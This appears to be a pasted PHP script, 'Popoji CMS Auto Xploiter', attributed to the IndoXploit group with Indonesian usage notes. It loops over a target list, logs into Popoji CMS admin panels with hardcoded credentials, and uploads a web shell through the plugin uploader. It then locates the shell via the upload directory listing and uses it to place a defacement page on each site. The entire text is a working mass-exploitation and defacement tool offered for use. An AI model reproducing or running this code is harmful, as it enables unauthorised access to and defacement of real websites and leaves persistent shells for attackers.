SHOW:
|
|
- or go back to the newest paste.
| 1 | <?php | |
| 2 | set_time_limit(0); | |
| 3 | error_reporting(0); | |
| 4 | ||
| 5 | function login($url,$user,$pass) {
| |
| 6 | $post_login = array( | |
| 7 | "mod" => "login", | |
| 8 | "act" => "proclogin", | |
| 9 | "username" => $user, | |
| 10 | "password" => $pass, | |
| 11 | ); | |
| 12 | $ch = curl_init(); | |
| 13 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); | |
| 14 | curl_setopt($ch, CURLOPT_URL, $url."/po-admin/login.php"); | |
| 15 | curl_setopt($ch, CURLOPT_POST, true); | |
| 16 | curl_setopt($ch, CURLOPT_POSTFIELDS, $post_login); | |
| 17 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); | |
| 18 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); | |
| 19 | curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); | |
| 20 | curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt'); | |
| 21 | curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt'); | |
| 22 | curl_setopt($ch, CURLOPT_COOKIESESSION, true); | |
| 23 | return curl_exec($ch); | |
| 24 | curl_close($ch); | |
| 25 | } | |
| 26 | function ch($url,$post) {
| |
| 27 | $ch = curl_init($url); | |
| 28 | if($post !=null) {
| |
| 29 | curl_setopt($ch, CURLOPT_POST, true); | |
| 30 | curl_setopt($ch, CURLOPT_POSTFIELDS, $post); | |
| 31 | } | |
| 32 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); | |
| 33 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); | |
| 34 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); | |
| 35 | curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); | |
| 36 | curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); | |
| 37 | curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); | |
| 38 | return curl_exec($ch); | |
| 39 | curl_close($ch); | |
| 40 | } | |
| 41 | function cek($url) {
| |
| 42 | $ch = curl_init($url); | |
| 43 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); | |
| 44 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); | |
| 45 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); | |
| 46 | curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); | |
| 47 | curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); | |
| 48 | curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); | |
| 49 | return curl_exec ($ch); | |
| 50 | curl_close($ch); | |
| 51 | } | |
| 52 | function cover() {
| |
| 53 | echo "<--------------------><-------------------->\n"; | |
| 54 | echo "[ Popoji CMS Auto Xploiter ]\n"; | |
| 55 | echo "// Coded by Mr. Error 404 ft. tu5b0l3d - IndoXploit //\n"; | |
| 56 | echo "cara pake: php popoji.php [list_target.txt] [shell_kalian.jpg] [shell_kalian.php] [file_deface.html]\n"; | |
| 57 | echo "contoh: php popoji.php target.txt indoxloit.jpg indoxploit.php deface.html\n"; | |
| 58 | echo "<--------------------><-------------------->\n\n\n"; | |
| 59 | } | |
| 60 | $username_popoji = "indoxploit"; // ganti dengan username kalian. | |
| 61 | $password_popoji = "indoxploit"; // ganti dengan paasword kalian. | |
| 62 | $sites = explode("\n", file_get_contents($argv[1]));
| |
| 63 | $shell = $argv[2]; | |
| 64 | $nama_shell = $argv[3]; | |
| 65 | $deface = $argv[4]; | |
| 66 | $pecah = explode(".", $nama_shell);
| |
| 67 | $nama = $pecah[0]; | |
| 68 | $ext = $pecah[1]; | |
| 69 | if(isset($sites) AND isset($shell) AND isset($nama_shell) AND isset($deface)) {
| |
| 70 | cover(); | |
| 71 | foreach($sites as $url) {
| |
| 72 | echo "[+] Nyecan: $url\n"; | |
| 73 | $login = login($url, $username_popoji, $password_popoji); | |
| 74 | if(preg_match("/beranda|keluar|selamat datang|member|admin/i", $login)) {
| |
| 75 | echo "[+] Login OK\n"; | |
| 76 | $post_upload = array( | |
| 77 | "file" => "@$shell", | |
| 78 | "name" => $nama_shell, | |
| 79 | ); | |
| 80 | ch($url."/po-admin/js/plugins/uploader/upload.php", $post_upload); | |
| 81 | $cek_folder = cek("$url/po-content/po-upload/");
| |
| 82 | if(preg_match("/Index of \/po-content\/po-upload/", $cek_folder) AND !preg_match("/403/", $cek_folder)) {
| |
| 83 | preg_match("/<li><a href=\"$nama-(.*?)-polibrary.$ext\">/", $cek_folder, $shellmu);
| |
| 84 | $shellmu[1] = "$nama-".$shellmu[1]."-polibrary.$ext"; | |
| 85 | $link_shell = $url."/po-content/po-upload/".$shellmu[1]; | |
| 86 | echo "[+] Shellmu: $link_shell\n"; | |
| 87 | $post_deface = array( | |
| 88 | "tipe_upload" => "home_root", | |
| 89 | "ix_file" => "@$deface", | |
| 90 | "upload" => "upload", | |
| 91 | ); | |
| 92 | $depes = ch($link_shell."?do=upload", $post_deface); | |
| 93 | if(preg_match("/uploaded!/i", $depes) AND preg_match("/hacked/i", cek("$url/$deface"))) {
| |
| 94 | echo "[+] Sukses Depes! -> $url/$deface\n\n"; | |
| 95 | } else {
| |
| 96 | echo "[-] Gagal Depes!!\n\n"; | |
| 97 | } | |
| 98 | } else {
| |
| 99 | echo "[+] Lokasi Shellnya forbidden / kena tebas gann :(\n\n"; | |
| 100 | } | |
| 101 | } else {
| |
| 102 | echo "[+] Login Gagal\n\n"; | |
| 103 | } | |
| 104 | } | |
| 105 | } else {
| |
| 106 | echo "cara pake: php ".$argv[0]." [shell_kalian.jpg] [shell_kalian.php] [file_deface.html]\n"; | |
| 107 | echo "contoh: php ".$argv[0]." shell.jpg indoxploit.php deface.html\n"; | |
| 108 | } | |
| 109 | ?> |
